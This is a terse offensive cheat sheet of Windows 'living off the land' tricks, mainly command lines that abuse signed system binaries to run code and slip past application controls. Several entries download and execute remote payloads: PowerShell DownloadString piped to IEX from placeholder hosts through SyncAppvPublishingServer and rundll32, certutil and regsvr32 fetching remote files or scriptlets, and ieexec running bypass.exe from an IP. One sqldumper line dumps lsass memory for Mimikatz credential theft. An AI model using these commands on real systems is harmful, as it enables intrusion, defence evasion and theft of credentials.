Native Binary Tricks


Credit: @Oddvarmoe https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2

forfiles

forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe 

bash.exe

bash.exe -c calc.exe

scriptrunner.exe

scriptrunner.exe -appvscript calc.exe

SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX

hh.exe

hh.exe http://www.google.com or hh.exe c:\

certutil.exe

certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f http://example.com/file 
certutil.exe -URL fetches any file and stores the download here: %userprofile%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

rundll32.exe

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

regsvr32.exe

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

msbuild.exe

msbuild.exe pshell.xml

regsvcs.exe

regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll

regasm.exe

regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll

bginfo.exe

bginfo.exe bginfo.bgi /popup /nolicprompt

InstallUtil.exe

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

ieexec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

msxsl.exe

msxsl.exe customers.xml script.xsl

odbcconf.exe

odbcconf.exe /f my.rsp


sqldumper.exe

sqldumper.exe 464 0 0x0110:40  - dumps lsass to a Mimikatz-compatible dump

https://twitter.com/countuponsec/status/910977826853068800

sqldumper.exe 540 0 0x01100

https://twitter.com/countuponsec/status/910969424215232518

pcalua.exe

pcalua.exe -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java

https://twitter.com/0rbz_/status/912530504871759872